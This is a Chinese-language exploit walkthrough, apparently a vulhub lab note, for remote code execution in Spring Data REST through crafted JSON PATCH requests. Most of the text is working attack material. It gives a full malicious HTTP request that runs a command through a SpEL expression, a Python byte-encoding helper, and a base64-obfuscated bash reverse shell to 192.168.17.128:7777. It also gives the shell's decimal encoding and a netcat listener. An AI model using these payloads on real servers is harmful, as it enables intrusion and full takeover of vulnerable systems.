Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码
- Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
- Spring Boot version < 2.0.0M4
- Spring Data release trains < Kay-RC3
命令执行
访问http://your-ip:8080/customers/1,然后抓取数据包,使用PATCH请求来修改
PATCH /customers/1 HTTP/1.1
Host: localhost:8080 ip修改为对方ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
其中new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}表示的命令touch /tmp/success
这是将每个字符转为对应的十进制,可以通过下面的python3代码进行转换:
payload = b'touch /tmp/success'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)
可以看到/tmp/目录中成功创建success
payload:
bash -i >& /dev/tcp/x.x.x.x/7777 0>&1进行base64编码:
bash -c {echo,xxx}|{base64,-d}|{bash,-i}
xxx内填写base64编码后的数据,如下
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3LjEyOC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3LjEyOC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}
通过进制转换将上面的数据转换为ASCII码
98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,51,76,106,69,121,79,67,56,51,78,122,99,51,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125
将上面的ASCII码替换到下面的payload,重新发送数据包
kali监听端口 nc -lvvp 7777
成功反弹shell